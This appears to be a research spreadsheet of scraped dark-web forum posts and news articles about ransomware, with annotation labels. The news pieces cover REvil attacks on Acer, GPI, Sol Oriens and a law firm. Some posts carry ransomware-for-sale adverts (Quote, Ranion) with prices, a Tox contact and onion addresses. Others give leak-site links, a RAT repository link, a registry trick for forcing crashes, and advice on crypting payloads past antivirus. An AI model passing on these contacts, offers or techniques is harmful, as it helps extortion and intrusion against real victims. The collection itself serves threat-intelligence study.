extremist ideologies, including terrorism.;;sites dedicated to financial and cybercrime activities like money laundering, currency counterfeiting, the trading of stolen bank cards and accounts, hacking services, and the distribution of harmful computer software like malware were also noted in the study.;;;who created it and why?;;the infrastructure of the dark web developed alongside the internet that we all know. in the 1990s, us security services realised there was a need for some sort of system that would hide and therefore protect the communications of their personnel online.;;from this research came tor and some of the other networks that allow users to access the internet anonymously. those who developed tor did so because of their belief that users should have private access to an uncensored version of the internet.;;from this 'wild west' vision of the internet sprang dark web sites.;;;what does bitcoin have to do with it?;;the cryptocurrency bitcoin is the primary currency of the dark web and without it, the dark web might not function in the way it does. bitcoin, and other similar cryptocurrencies, essentially facilitate the anonymous sale and purchase of goods and services on the dark web.;;;can't we just shut it down?;;no, not exactly. the dark web, like the normal internet, is a massively complex system interconnected with countless servers all around the world. the most law enforcement agencies can hope to do is target individual sites engaged in illegal activities - and several of these have successfully been taken down in the past.;;this is an expensive and time-consuming effort however, given how difficult it track down those behind them and, more often than not, as soon as one site is shut down, another usually pops up in its place. governments have been introducing new regulations aimed at regulating the cryptocurrencies which fuel the dark web, as well as allocating extra resources to policing it, but as with many crimes in the online arena, it may be some time yet before the law catches up with the technology involved.</t>
  </si>
  <si>
    <t>Article on why criminals are using the dark web including ransomware</t>
  </si>
  <si>
    <t>31/05/2021 18:17</t>
  </si>
  <si>
    <t>6ffd32c6b87bc9a3413a</t>
  </si>
  <si>
    <t>Q&amp;A: What Is The Dark Web and Why do Criminals Use It?</t>
  </si>
  <si>
    <t>;;questions pertaining to android ransomware;;by;/u/mrmandrake;���;2 years ago;in;/d/malware;;2 points;���;</t>
  </si>
  <si>
    <t>Post regarding questions about android ransomware</t>
  </si>
  <si>
    <t>/u/MrMandrake</t>
  </si>
  <si>
    <t>19/09/2020 09:59</t>
  </si>
  <si>
    <t>fac3c0e6c5763419a8eb</t>
  </si>
  <si>
    <t>Questions pertaining to Android Ransomware</t>
  </si>
  <si>
    <t>android ransomware is hard, i think maze is working on some currently but i'm not sure how far they've got.;;here is a good starting point (clearnet obviously):;https://github.com/ahmyth/ahmyth-android-rat</t>
  </si>
  <si>
    <t>23/09/2020 18:39</t>
  </si>
  <si>
    <t>a5a1f07e3b9a0f113658</t>
  </si>
  <si>
    <t>4 days 08:40:00</t>
  </si>
  <si>
    <t>hello,;;;we are quote, developers of quote ransomware, written in cpp for windows os.;our team decided to enter the public market and grant access for every individual in this lucrative industry.;;our focus within this release stands on small and mid cap operations for newcomers who'd like to enter the market.;we intentionally do not advertise our software for the big bucks, as we will not offer advanced support like c2 access nor webpanel / db logins.;even the software is capable of domain / gpo spreading, we removed some advanced ttps to reduce unnecessary maintainance and competition with our brothers and sisters.;;use it for example in internet cafes, small callcenter agencies or other inside jobs.;only your creativity is the limit. make your wallet great again!;;;pro:;- ***unique feature*** date-based* locker;- every build comes with unique and new generated rsa private / public key;- custom note with your individual text and requested amount;- we take no decryption fee;;con:;- no access to webpanel ui or negotiation chat;- not crypted for industrial grade av with endpoint &amp; workload protection;;*date-based is our unique feature for this public build, so the locker and unlocker is not able to execute after a specific datetime.;;what you get:;locker.exe and unlocker.exe in zip archive with password protection after payment.;;price:;locker.exe and unlocker.exe valid 07 days for only 49.25 usd in xmr.;locker.exe and unlocker.exe valid 14 days for only 69.25 usd in xmr.;locker.exe and unlocker.exe valid 30 days for only 89.25 usd in xmr.;***special promotion*** bulk orders for larger quantities or long term validation get special discount.;;trial:;we offer locker and unlocker valid for 24h to test, trial binaries have all the same private / public key for protecting against abuse.;;contact us today!;- pm;- tox id: 41ebc132b740bba39f8aa786c00db5cffbdeca63a6b05f7940f49388b15184634c4f2e7b8dfa;;[img]https://transfer.sh/gqq8jn/1.png[/img];[img]https://transfer.sh/wjejqi/3.png[/img];[img]https://transfer.sh/6tqdxq/4.png[/img]</t>
  </si>
  <si>
    <t>Quote ransomware group advertising itself</t>
  </si>
  <si>
    <t>/u/Quote4241</t>
  </si>
  <si>
    <t>23/07/2022 04:47</t>
  </si>
  <si>
    <t>3b4a90335d0d83f7383b</t>
  </si>
  <si>
    <t>Quote ransomware release for small and mid cap operations</t>
  </si>
  <si>
    <t>cuba updated to v3, but the ransomware group sites-site still lists their v2:;;http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion</t>
  </si>
  <si>
    <t>information regarding cuba ransomware</t>
  </si>
  <si>
    <t>68b92df37896c14a81fc</t>
  </si>
  <si>
    <t>RAAS Group List</t>
  </si>
  <si>
    <t>0 days 22:40:00</t>
  </si>
  <si>
    <t>2 days 02:06:00</t>
  </si>
  <si>
    <t>another groupsite wiki:;;http://ransomwr3tsydeii4q43vazm7wofla5ujdajquitomtd47cxjtfgwyyd.onion/;;one was shutdown recently that used to work.</t>
  </si>
  <si>
    <t>1 days 03:26:00</t>
  </si>
  <si>
    <t>contact on cryptbb, look for ranion.raas user, the official account for ranion rasomwware.;;---------------------------------------------------------------------;;ranion (raas) | fud ransomware + darknet c2 + no fees;;on darknet since 2016! re-fud/private stubs for each customer!;;[+] packages comparison;;;;we have 4 different packages:;;- #test (1-month);- #standard (6-month);- #premium (12-month);- #elite (12-month);;free features: delayed start, delayed encryption, mutex, task manager/registry editor disabler, uac bypass, desktop wallpaper changer, offline encryption, additional file types encryption, additional language sub-banners.;;paid addons: dropper, clone, fud+, unkillable process (aka bsod).;;[+] discount;;- 10% discount for cryptbb users.</t>
  </si>
  <si>
    <t>Asking for users to try Ranion ransomware</t>
  </si>
  <si>
    <t>3e9cca605661b56d4e02</t>
  </si>
  <si>
    <t>RANION (RaaS) | FUD Ransomware + C&amp;C on Darknet + NO Fees</t>
  </si>
  <si>
    <t>example package:;;c++ fud ransomware (aes 256 encryption with a 64 chars long uncrackable key);c++ decrypter;stub size: ~90kb (unique exe for each buyer);stub #: 1 fud exe;platform: windows (both x86 and x64);duration: 1 month access to darknet c&amp;c dashboard (to receive the aes keys from clients);fees: we take no fees from your clients;features: delayed start, delayed encryption, mutex, task manager disabler, uac bypass, desktop wallpaper         changer;ip tracking: yes;offline encryption: yes;support: yes;real-time client manager: yes;paid add-on (dropper): execute your own exe (backdoor, implant, etc.);paid add-on (clone): a fresh fud ranion copy with the same setup information;paid add-on (crypter): additional crypter/obfuscator + unique onion address (+20 usd);paid add-on (unkillable process): unkillable process aka bsod;free add-on: optional file types to encrypt (for all encrypted file types see faq);free add-on: optional client's sub-banner in your language (already present en, ru, de, fr, es, it, nl, fas, za);intended to test our service;;;address: kniephs2r6nhxe7d.onion</t>
  </si>
  <si>
    <t>/u/ransonion</t>
  </si>
  <si>
    <t>17/07/2019 16:14</t>
  </si>
  <si>
    <t>68425d3a7fd091b7e111</t>
  </si>
  <si>
    <t>RANION - Better &amp; Cheapest FUD Ransomware + Darknet C&amp;C + NO Fees</t>
  </si>
  <si>
    <t>proudly presenting our rewritten ransomware. everything is a lot more improved.;;;example package:;c++ fud ransomware (aes 256 encryption with a 64 chars long uncrackable key);c++ decrypter;stub size: ~90kb (unique exe for each buyer);stub #: 2 fud exes (the second one after 6 months);platform: windows (both x86 and x64);duration: 12 months access to darknet c&amp;c dashboard (to receive the aes keys from clients);fees: we take no fees from your clients;features: delayed start, delayed encryption, mutex, task manager/registry editor disabler, uac bypass, desktop  wallpaper changer;ip tracking: yes;offline encryption: yes;support: yes;real-time client manager: yes;paid add-on (dropper): execute your own exe (backdoor, implant, etc.) (free);paid add-on (clone): a fresh fud ranion copy with the same setup information (+90 usd);paid add-on (crypter): additional crypter/obfuscator + unique onion address (+90 usd);paid add-on (unkillable process): unkillable process aka bsod (+90 usd);free add-on: optional file types to encrypt (for all encrypted file types see faq);free add-on: optional client's sub-banner in your language (already present en, ru, de, fr, es, it, nl, fas, za);;;;;more information here:;;address: kniephs2r6nhxe7d.onion;</t>
  </si>
  <si>
    <t>17/07/2019 16:26</t>
  </si>
  <si>
    <t>07ee0d5b6bcd14c16b86</t>
  </si>
  <si>
    <t>40 days 05:20:00</t>
  </si>
  <si>
    <t>a lot of this stuff is easy to implement. 90 for a protected task that bsod when you kill it? cm on;;just have the c application inject a dword in hkey_local_machine\system\currentcontrolset\services\i8042prt\parameters to trigger bsod on application exit. takes two seconds to google, now where is my 90 dollars??</t>
  </si>
  <si>
    <t>/u/X3R</t>
  </si>
  <si>
    <t>18/07/2019 08:17</t>
  </si>
  <si>
    <t>0 days 15:51:00</t>
  </si>
  <si>
    <t>raas is for people that cannot even create simple scripts, if non tech person would try to implement above function, it would take a few weeks when starting from the bottom</t>
  </si>
  <si>
    <t>19/07/2019 16:00</t>
  </si>
  <si>
    <t>1 days 07:43:00</t>
  </si>
  <si>
    <t>hey,;;i have the ability to access a couple thousand social security numbers and other fullz info and  i would like to learn how use malware/ransomware in order to gather as much info from the system as possible.  can anyone help out or point me to resources? thanks!</t>
  </si>
  <si>
    <t>User asking for resources for learning ransomware</t>
  </si>
  <si>
    <t>/u/itemseed</t>
  </si>
  <si>
    <t>23/10/2019 04:40</t>
  </si>
  <si>
    <t>50a3fcf791ac01543c4e</t>
  </si>
  <si>
    <t>RAT/MALWARE advice</t>
  </si>
  <si>
    <t>4 days 10:21:00</t>
  </si>
  <si>
    <t>raas?</t>
  </si>
  <si>
    <t>/u/Noir</t>
  </si>
  <si>
    <t>27/10/2019 15:01</t>
  </si>
  <si>
    <t>3 days 17:47:00</t>
  </si>
  <si>
    <t>what do you think on the situation? they hacked into the grubman law firm, stole documents with ransomware etc. now they threaten to release trump's "dirty laundry" unless $42 million is paid (scheduled to be release via their darknet site in 5 days).;;seems like a new situation and too intriguing.</t>
  </si>
  <si>
    <t>User asking for opinions on revil threatening to leak information from grubham law firm</t>
  </si>
  <si>
    <t>/u/wreckdast</t>
  </si>
  <si>
    <t>17/05/2020 16:41</t>
  </si>
  <si>
    <t>1e3a392d5c9ae68d7e1c</t>
  </si>
  <si>
    <t>REVIL group blackmailing the US President</t>
  </si>
  <si>
    <t>4 days 05:37:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;revil previously infected the networks of honda, the makers of jack daniels and a high-profile law firm representing donald trump. cyberattackers behind the revil ransomware have claimed another victim, this time global laptop conglomerate acer, and are demanding a record $50 million ransom.;;first reported by bleeping computer, the attackers announced that they had breached acer's systems on friday by posting financial documents and bank forms from the taiwanese laptop, desktop and monitor maker. acer sent out the same statement to multiple news outlets, refusing to confirm or deny the attack and only saying companies like it "are constantly under attack, and we have reported recent abnormal situations observed to the relevant law enforcement and data protection authorities in multiple countries.";;"acer discovered abnormalities from march and immediately initiated security and precautionary measures. acer's internal security mechanisms proactively detected the abnormality, and immediately initiated security and precautionary measures," the company said in a statement to zdnet. subsequent reporting over the weekend from lemagit and searchsecurity found the attackers wanted the $50 million paid in monero cryptocurrency and offered to cut the price by 20% if payment was delivered on march 17, which it appears it was not.;;computerweekly, a sister site of lemagit and searchsecurity, reported that acer's negotiators allegedly offered $10 million, which was turned down by the attackers, who gave a march 28 deadline for payment. if the ransom is not paid by that date, it will be doubled, according to computerweekly.;;bleeping computer had a photo of the ransom demand and said acer's representatives began speaking with the attackers on march 14. searchsecurity found that evidence of the hack was posted to the "happy blog" where revil attackers generally post the information they steal.;;bleeping computer also reported that there are some indications showing the people behind revil used a microsoft exchange server on acer's domain, potentially making it one of the first times a ransomware group leveraged a heavily publicized vulnerability to complete an attack.;;"it was only a matter of time before the recent microsoft exchange vulnerability exploited an organization, and in the current climate, it was swift," said james mcquiggan, security awareness advocate at knowbe4. "the wannacry ransomware from 2017 utilized the eternalblue exploit and took only a few months before a massive attack occurred. with this attack, it took just weeks.";;oliver tavakoli, cto at vectra, said that organizations should expect that the microsoft exchange server vulnerabilities will be leveraged by a number of actors with varying objectives over the coming weeks and months.;;targeted ransomware actors like revil will see this as a particular boon as the many bespoke steps of an attack���infiltration, reconnaissance, gaining access to valuable data���can be short-circuited with a direct attack on an organization's exchange server, tavakoli "the size of the ransom request comes down to threat actors testing the market with a fantastical opening gambit���i would guess that acer would either pay no ransom or would negotiate a much-reduced a" tavakoli added.;;the $50 million figure is considered the largest ransom to ever be demanded by ransomware attackers, according to zdnet, which said the previous high was $30 million.;;the group behind the revil ransomware has made millions since emerging in 2019. interpol was watching the group starting last march, when it reported that the gang was targeting manufacturers in march and wholesale distributors in april.;;ivan righi, cyber threat intelligence analyst at digital shadows, said the revil ransomware group is known for its high ransom demands and referenced a recent attack in february where the group demanded $30 million ransom from dairy farm, a pan-asian retailer.;;"the large demand suggests that revil likely exfiltrated information that is highly confidential, or information that could be used to launch cyber attacks on acer's customers," righi said.;;in 2020, the group launched several high profile attacks targeting companies like money transfer service travelex, honda, jack daniels maker brown-forman and law firm grubman shire meiselas &amp; sacks, which represents major figures like former president donald trump, rod stewart, lady gaga, madonna and robert de niro.;;it is unclear whether the organizations attacked paid the ransoms, but atlas vpn reported that travelex did end up paying revil $2.3 million. malwarebytes' 2021 state of malware report said the revil attackers claimed to have made $100 million in 2020, mostly from demanding payment for not posting stolen data.;;the group was so successful in 2020 that it began holding dark web competitions in order to recruit new members and expand, even depositing $1 million into one forum as proof of their financial feats, according to a report from digital shadows.;;"sophisticated cyber criminal organizations like revil understand the basic elements of information security and have developed a double-whammy attack style which leaves their victims vulnerable on both fronts. they will always seek to encrypt and exfiltrate data to give themselves more vectors of leverage to extort money for its decryption and/or safe return," said brian higgins, security specialist at comparitech.;;"some companies have paid large sums for the latter in the past, trusting their blackmailers when they say that they haven't shared or sold the data prior to its safe return. but they are organized criminals, so can you really expect them to be telling the truth when they stand to make millions in ransoms and even more for selling the data to other criminal organizations?";;those behind the ransomware even created an-ebay like forum where people could bid on stolen data using monero cryptocurrency, app gate noted in a report last year. brent johnson, ciso at bluefin, said it is not enough to simply have backups of data anymore, urging enterprises to encrypt or tokenize sensitive data to make it less valuable for attackers.;;"if not, hackers can leverage clear-text data to demand companies pay, or they will expose the data in what is being called a 'double-extortion' scheme," johnson said. other cybersecurity experts focused on the use of microsoft exchange vulnerability as one of the most concerning aspects of the attack.;;netenrich chief information security officer brandon hoffman noted that attackers are eager to take advantage of the microsoft exchange vulnerability because it has been a long time since a technology so prolific was so easily exploited.;;"the name of the game in ransomware is finding easy entry points, and that is what the exchange vulnerability presented. the third consideration is that cyber criminals have been investing their time in supply chain and developer tool attacks, which has reduced the focus on ransomware attacks since they are now playing the 'long game,'" hoffman said.;;"this presents an opportunity in itself because attackers who saw the payoff from these supply chain attacks left a gap where ransomware operators have more available attack surface (meaning ransomware will become a bull market again)."</t>
  </si>
  <si>
    <t>Article about revil attack on Acer</t>
  </si>
  <si>
    <t>f5db0f7dabad2f3dd6cd</t>
  </si>
  <si>
    <t>REvil Continues Ransomware Attack Streak with Takeover of Laptop Maker Acer</t>
  </si>
  <si>
    <t>{'revil': 10, 'ransomware': 12}</t>
  </si>
  <si>
    <t>well... it was fun whilst it lasted.;;;source:;https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/</t>
  </si>
  <si>
    <t>information link to revil ransom arrest</t>
  </si>
  <si>
    <t>14e1eb3c27e322306924</t>
  </si>
  <si>
    <t>REvil Ransom Arrest, $6M Seizure, and $10M Reward</t>
  </si>
  <si>
    <t>0 days 11:28:00</t>
  </si>
  <si>
    <t>how does one join a ransom ware group without having the skills lol</t>
  </si>
  <si>
    <t>about time revil</t>
  </si>
  <si>
    <t>0 days 06:54:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the revil ransomware operators made the headlines again, this time the gang claims to have hacked the gaming partners international (gpi).;;gaming partners international (gpi) is a full-service supplier of gaming furniture and equipment for casinos worldwide. the revil ransomware gang (aka sodinokibi) claims to have stolen info from the systems at the company before encrypting them.;;recently, one of the members of the gang that goes online with the moniker unkn, announced in an interview with yelisey boguslavskiy that they were planning an attack against a prominent organization in the gaming network.;;the attack happened and today the revil ransomware operators added gaming partners international to their dedicated leak site. the cybercrime gang published some screenshots showing directories and files from the systems of the breached company.;;the message published by the ransomware gang threatens to release the stolen data if the company will not pay the ransom within 72 hours. the hackers claim to have stolen 540gb of technical and financial documents stolen form the company.;;���absolutely all servers and working computers of the company are hacked and encrypted. there was a large data leak 540gb of the most important information of the company, technical data, financial documents, contracts with all casino in las-vegas, macao, europe, bank documents.��� reads the message published by the ransomware operators.;;the list of victims of the revil ransomware gang is long and includes the london-based travelex, the law firm of the stars, grubman shire meiselas &amp; sacks (gsmlaw), the law firm seyfarth shaw, and us-based supplier of video delivery software solutions, seachange in</t>
  </si>
  <si>
    <t>Article on ransomware attack on GPI by revil</t>
  </si>
  <si>
    <t>65f3fa8f24cd852c2f6c</t>
  </si>
  <si>
    <t>REvil Ransomware Gang Hacked Gaming Firm Gaming Partners International</t>
  </si>
  <si>
    <t>{'revil': 4, 'ransomware': 6}</t>
  </si>
  <si>
    <t>the ransomware group revil just returned and leak their stuff on their old website:;;http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion;;they now call their blog "happy blog".</t>
  </si>
  <si>
    <t>post stating revil has returned and a link to their leak website</t>
  </si>
  <si>
    <t>0d1e6bc5b733e980a675</t>
  </si>
  <si>
    <t>REvil is back!</t>
  </si>
  <si>
    <t>4 days 23:41:00</t>
  </si>
  <si>
    <t>i think it's a bit too early to make that call. there are no new leaks after july 13 2021 (when the happy blog shut down), and http://decoder.re/ is still down.</t>
  </si>
  <si>
    <t>User debating whether it is too early to say if revil was back in operation or not</t>
  </si>
  <si>
    <t>0 days 00:39:00</t>
  </si>
  <si>
    <t>what is their website to buy the ransomware?</t>
  </si>
  <si>
    <t>User asking for a link to revil leak website</t>
  </si>
  <si>
    <t>/u/maximumspider</t>
  </si>
  <si>
    <t>14/09/2021 09:38</t>
  </si>
  <si>
    <t>4 days 09:48:00</t>
  </si>
  <si>
    <t>us nuclear weapons contractor sol oriens has suffered a cyberattack allegedly at the hands of the revil ransomware gang, which claims to be auctioning data stolen during the attack.;;sol oriens describes itself as helping the "department of defense and department of energy organizations, aerospace contractors, and technology firms carry out complex programs.";;however, job postings first spotted by cnbc correspondent eamon javers provide some insight into sol orien's operations, who are seeking program managers, consultants, and a 'nuclear weapon system subject matter expert' to work with the national nuclear security administration (nnsa).;;"sol oriens llc currently has an opening for a senior nuclear weapon system subject matter. expert with more than 20 years of experience with nuclear weapons like the w80-4. this. subject matter expert works with nnsa federal and other contractor personnel to organize,. coordinate, implement, and manage technical program activities for the w80-4 life extension. program.," says one of the job postings.;;"position responsibilities. planning and managing nuclear weapon life extension programs and associated. stockpile management as they relate to the maintenance of a highly reliable and safe. nuclear deterrent.";;revil claims to have stolen data from sol oriens;;last week, the revil ransomware operation listed companies whose data they were auctioning off to the highest bidder.;;one of the listed companies is sol oriens, where revil claims to have stolen business data and employees' data, including salary information and social security numbers.;;as proof that they stole data during the attack, revil published images of a hiring overview document, payroll documents, and a wages report.;;as a way to pressure sol oriens into paying the threat actor's extortion demands, the ransomware gang threatened to share "relevant documentation and data to military angencies (sic) of our choise (sic).";;in a statement shared by javers on twitter, sols oriens confirmed a cyberattack in may 2021 that affected their network.;;"the investigation is ongoing, but we recently determined that an unauthorized individual acquired certain documents from our systems.";;"those documents are currently under review, and we are working with a third-party technological forensic firm to determine the scope of potential data that may have been involved.";;"we have no current indication that this incident involves client classified or critical security-related information. once the investigation concludes, we are committed to notifying individuals and entities whose information is involved.";;like many other ransomware operations, revil is believed to be operating out of russia or another cis country.;;over the weekend, g7 leaders issued a statement asking russia to help disrupt ransomware gangs believed to be operating within its borders.;;president biden will also be discussing the recent ransomware attacks with russian president vladimir putin at the june 16th geneva summit.</t>
  </si>
  <si>
    <t>Article describing the ransomware attack on Sol Oriens by revil</t>
  </si>
  <si>
    <t>15/06/2021 13:26</t>
  </si>
  <si>
    <t>194016a9dfacb6a6f7d5</t>
  </si>
  <si>
    <t>REvil ransomware hits US nuclear weapons contractor</t>
  </si>
  <si>
    <t>0 days 13:44:00</t>
  </si>
  <si>
    <t>{'extortion': 1, 'revil': 5, 'ransomware': 6}</t>
  </si>
  <si>
    <t>it's weird to me how these major companies and infrastructure plants don't have better opsec. these are obviously speer phishing attacks where they trick someone to open an email attachment with a payload and it spreads through the network.;;they could buy bulk copies of zonealarm anti-ransomwear for $1.99/mo and have no problems, not to mention to teach their employees not to open random attachments, even if it looks like it's from a local email.;;dumb dumb dumb.</t>
  </si>
  <si>
    <t>15/06/2021 13:33</t>
  </si>
  <si>
    <t>the problem is, the hackers can remove any security software, no matter the protection.;if they don't want to waste time, they can encrypt everything from a virtual machine.;;employees cannot be banned from opening all attachments and security software can go only so far to detect it.</t>
  </si>
  <si>
    <t>15/06/2021 13:39</t>
  </si>
  <si>
    <t>whatever they're using, it might be zero day, but it's not bulletproof. zonealarm anti-ransomwear, for example, has a honeypot feature where if they see random files on the hdd being accessed for no reason they'll shut down the machine.;;sure, employees can't be banned from opening attachments, but they could seriously up their security by using something like barracuda email filtering and teaching them not to blindly open attachments. they could be opening attachments in a sandbox virtual machine to make sure whatever they're opening doesn't spread. it would be a hassle to do that, but it would go along way.;;the real way that this is going to stop is if microsoft and adobe harden their memory blocking features for their software to keep it from executing remote code inside their software.</t>
  </si>
  <si>
    <t>15/06/2021 13:56</t>
  </si>
  <si>
    <t>0 days 00:17:00</t>
  </si>
  <si>
    <t>so strange how all these attacks start happening when biden gets into office, have you guys noticed that?;;russia always gets the blame, you would've thought if these companies make the amounts of money that they claim to they would have far better opsec to avoid these situations we will see these same attacks over and over again. one large corp sees another get attacked and radically think "oh well atleast it wasnt us". laughable honestly.;;it's like recently with that one corp where we clearly heard about a coordinated attack against cryptocurrency. "the fbi seized bitcoin from a wallet" no they seized it from an exchange inwhich if a hacker group are smart enough to infiltrate an entire system they know for a fact to either get paid in privacy coins or at the bare minimum not store it on an exchange where the fbi will happily serve a warrant and coinbase or whoever will happily give them access. it's nonsense honestly.</t>
  </si>
  <si>
    <t>/u/Zenderman</t>
  </si>
  <si>
    <t>15/06/2021 14:24</t>
  </si>
  <si>
    <t>news flash!!!!  9k ransomware hits hot mom panties!!!!;;baaweeeeewwwaaweeeee!!!!</t>
  </si>
  <si>
    <t>15/06/2021 15:28</t>
  </si>
  <si>
    <t>they do a lot of research before doing anything, scanning for vulnerabilities, it's the old great wall of china thing, where the mongol horde was let in through a gate, rendering the wall mostly useless; they grabbed core data before encrypting it all.;they pentested the perimeter as well as phishing. then they doubled down with the raas equivalent of a choke-hold:;;they indicated that they would be willing to give stock traders information about upcoming leaks in order to allow them potential profits due to stock price drops after an announced breach. in another notable example, an attacker was able to obtain the victim's cyber insurance policy and leveraged this information during the ransom negotiation process refusing to lower the ransom amount given their knowledge of the policy limits. this reinforces that during the post-exploitation phase of ransomware incidents, threat actors can engage in internal reconnaissance and obtain data to increase their negotiating power.;;;iuuqt;//0xthreatintel,medium,com/in-depth-analysis-of-stop-ransomware-12b167b03fa9;iuuqt;//www,fireeye,com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations,html;iuuqt;//www,maldefense,com/colonial-pipeline-attack-darkside-ransomware-analysis.html;iuuqt;//www,pandasecurity,com/en/mediacenter/pandalabs/sodinikibi-ransomware-report/</t>
  </si>
  <si>
    <t>15/06/2021 19:57</t>
  </si>
  <si>
    <t>0 days 04:29:00</t>
  </si>
  <si>
    <t>sounds like more of the ol' classic fbi 6-week cycle to me from the obama era. only now with ransomware instead of mass shootings.;;sketch as fuck.</t>
  </si>
  <si>
    <t>/u/mrmecheaks</t>
  </si>
  <si>
    <t>16/06/2021 01:17</t>
  </si>
  <si>
    <t>0 days 05:17:00</t>
  </si>
  <si>
    <t>revil/sodinikobi held grubman shire meiselas &amp; sacks ransom for $21million. there was a bunch of celeb legal documents in there and revil claimed info on donald trump was in the data.;;the company didn't pay. revil updated the info leak auction page to say:;;"no one paid for this lot in time. so the data is published. ";;but the link for the data leak is: https://url.url;;clearly some fucked up link there.;;was this data actually leaked somewhere?;;the auction page and this stuff can be seen at the page in my comment</t>
  </si>
  <si>
    <t>User asking for functional revil information leak website for the Grubham ransomware attack after the initial one does not work</t>
  </si>
  <si>
    <t>3736dc5621b92eaf5295</t>
  </si>
  <si>
    <t>REvil/Sodinikobi published the data of Grubman Shire Meiselas &amp; Sacks with a broken link. Is this info leak actually available somewhere?</t>
  </si>
  <si>
    <t>{'revil': 2}</t>
  </si>
  <si>
    <t>here's their page where you can see this:;;dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd [dot] onion/auctions/10</t>
  </si>
  <si>
    <t>i am interested in this, please direct me in the right direction. preferably smaller size attacks, not looking to go enterprise. previously, only very tech savvy individuals and groups were able to hit for ransomware but ever since raas came into play the barrier of entry has significantly been lowered.</t>
  </si>
  <si>
    <t>User asking for more information about raas</t>
  </si>
  <si>
    <t>/u/Notathrowaway</t>
  </si>
  <si>
    <t>d593d5d0c688382973ef</t>
  </si>
  <si>
    <t>RaaS - Ransomware As A Service</t>
  </si>
  <si>
    <t>any raas services, that i can buy ?</t>
  </si>
  <si>
    <t>User asking where to buy raas</t>
  </si>
  <si>
    <t>/u/rna98745</t>
  </si>
  <si>
    <t>29/10/2021 09:19</t>
  </si>
  <si>
    <t>78bbd15b2d4a754529ef</t>
  </si>
  <si>
    <t>RaaS Services !</t>
  </si>
  <si>
    <t>218 days 02:14:00</t>
  </si>
  <si>
    <t>you obviously don't understand the concept of raas, they pretty much loan you the malware in exchange for percentage. you can't buy it, you just get login to the panel from where you can export samples that are going to be used, and manage your operations from.</t>
  </si>
  <si>
    <t>29/10/2021 11:02</t>
  </si>
  <si>
    <t>hey, you can check out;/d/redeemer;on this very forum.;i am the maker and only developer of it.;it's free to use, however i do charge 20% of your earnings for decrypting the master key.;it's a developer fee, which in return gives me more motivation to improve and code more features.</t>
  </si>
  <si>
    <t>29/10/2021 11:16</t>
  </si>
  <si>
    <t>can you tell me some gangs that offer raas services and how to contact them, please?</t>
  </si>
  <si>
    <t>/u/layconbest</t>
  </si>
  <si>
    <t>10 days 05:43:00</t>
  </si>
  <si>
    <t>it doesn't work like that, you can't just stroll into ransomware affiliate program off the street so to speak.</t>
  </si>
  <si>
    <t>0 days 02:27:00</t>
  </si>
  <si>
    <t>well, most of the active ransomware gangs now, conti, avos, pysa, grief, lockbit, sugar...;;you can contact only on ramp. ransomware marketplace;kind of exclusive forum, 3 digit number of users, invite only;;i have acc;;;they were also available on xss and exlpoit, until the colonial pipeline got pwn3d and ar3s said that ransomware is going to far and he doesnt want all users of forum to be targeted by 3 letter agencies because of actions of 5-6 groups.;;after that, only on ramp;;but doesnt matter, even before, if you are nothing and no one on exploit and/or xss, or eventually verif, or if you don't already have bunch of initial acceses, or some backdoors or your own botnet, there is no theoretical chance they will allow you in</t>
  </si>
  <si>
    <t>why is more secure ? unless not being a target because of being irrelevant ?;;why panel ?;because none, and i am telling you, none, company will pay any serious amount through email. panel is standard.;;;show my any news article of succesfully paid ransom against some company done by your ransomware team ? what is the highest payment you had  ?;;;this for russia and opsec and stuff you said is just self-contradictory giberrish unworthy of answer.;;;;anyway,  your ransomware is decent tool for those idiots who live with their parents and do some 'hacking' to have pocket money for weed;;yes, they then don't need any opsec, cause they are irrelevant;;;;;yes, in pm i explained you that your stuff is noob shit, now i want also to explain to others.</t>
  </si>
  <si>
    <t>1 days 17:15:00</t>
  </si>
  <si>
    <t>so more people get to learn about it and use it instead of the shitty russian ransomwares obviously. if people knew, they wouldn't ask so, my reply is indeed helpful. why pay someone for ransomware or contact sketchy groups when you can download and use my software for free and if the victims contacts you i get a part of the pay. it's a win-win for everyone, from my point.</t>
  </si>
  <si>
    <t>0 days 08:41:00</t>
  </si>
  <si>
    <t>how so? if you think this please give me points where i can improve. saying this without any reasons does not make it a valid point.;;my code isn't shitty by any means, considering that the ransomware didn't get decrypted forcefully by any tools - which isn't a thing that you can say about most groups. i believe this is the best quality of a ransomware, isn't it?</t>
  </si>
  <si>
    <t>0 days 15:52:00</t>
  </si>
  <si>
    <t>so i want to earn some money.im good at hacking.im looking for a ransomware as service suppliers .do you guys know any of them ?</t>
  </si>
  <si>
    <t>User asking where to find raas websites</t>
  </si>
  <si>
    <t>/u/wannabaeransom</t>
  </si>
  <si>
    <t>29/10/2020 21:16</t>
  </si>
  <si>
    <t>c7912e33deac1265fb36</t>
  </si>
  <si>
    <t>RaaS Websites</t>
  </si>
  <si>
    <t>25 days 19:46:00</t>
  </si>
  <si>
    <t>dude if you're thinking about hitting someone with a ransomware make your own.  the source codes of many ransomwares are easily found. but all you need to do is find a vuln that is not yet patched and write an exploit for it (wanna cry used eternal blue exploit which affects win7 systems) .;since you said you're good at hacking i dont think that it'd take time to find a new vuln(keep win10 out of it as it's patched frequently and most people update it);;now you need to get it through avs. since you're a good hacker cryptography must be easier for you.  you can crypt it by yourself or you can buy a cryptor.</t>
  </si>
  <si>
    <t>3 days 11:55:00</t>
  </si>
  <si>
    <t>for those not good at hacking would you recommend using the expensive raas that are sold on dark markets? (like the $3000.00 russian ones?) they look easy to use but seem too good to be true which is why i did try rainion when i saw it  year ago</t>
  </si>
  <si>
    <t>23/11/2020 18:08</t>
  </si>
  <si>
    <t>21 days 08:32:00</t>
  </si>
  <si>
    <t>yes you can try raas. try not to get scammed ;)</t>
  </si>
  <si>
    <t>23/11/2020 18:55</t>
  </si>
  <si>
    <t>make sure that you ask what the vuln is and which language it's written in so that you don't get scammed.</t>
  </si>
  <si>
    <t>24/11/2020 16:30</t>
  </si>
  <si>
    <t>just bought a raas subscription.;anyone advice where to get crypters and binders?</t>
  </si>
  <si>
    <t>User who has purchased raas has asked for information to find crypters and binders</t>
  </si>
  <si>
    <t>31/12/2019 19:04</t>
  </si>
  <si>
